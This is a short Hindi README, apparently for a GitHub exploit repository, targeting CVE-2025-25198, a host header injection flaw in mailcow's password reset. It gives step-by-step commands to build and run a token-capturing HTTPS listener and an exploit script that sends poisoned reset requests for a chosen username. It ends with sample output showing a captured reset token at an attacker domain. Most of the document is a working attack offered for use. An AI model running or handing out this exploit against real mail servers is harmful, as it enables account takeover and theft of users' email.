
मेलकाउ होस्ट हेडर इंजेक्शन हमलों से पासवर्ड रीसेट टोकन कैप्चर करता है।
mailcow: dockerized डॉकर पर आधारित एक ओपन सोर्स ग्रुपवेयर/ईमेल सूट है। संस्करण 2025-01a से पहले, mailcow की पासवर्ड रीसेट कार्यक्षमता में एक कमजोरी है जो हमलावर को Host HTTP हेडर में हेरफेर करके एक पासवर्ड रीसेट लिंक उत्पन्न करने की अनुमति देती है जो हमलावर-नियंत्रित डोमेन की ओर इंगित करता है। यदि कोई उपयोगकर्ता जहरीले लिंक पर क्लिक करता है तो यह खाता अधिग्रहण का कारण बन सकता है।
सभी अनुरोधों को सुनने के लिए एक https सर्वर सेट करता है और आपके चयनित के साथ Host हेडर के साथ वेबसाइट पर एक POST अनुरोध भेजता है। आप अनुरोध भेजने और सर्वर में टोकन प्राप्त करने के लिए Burpsuite का भी उपयोग कर सकते हैं।
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port> <--insecure | optional >
थोड़ी देर प्रतीक्षा करने के बाद सर्वर वह टोकन आउटपुट करेगा जिसका आप उपयोग कर सकते हैं:
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245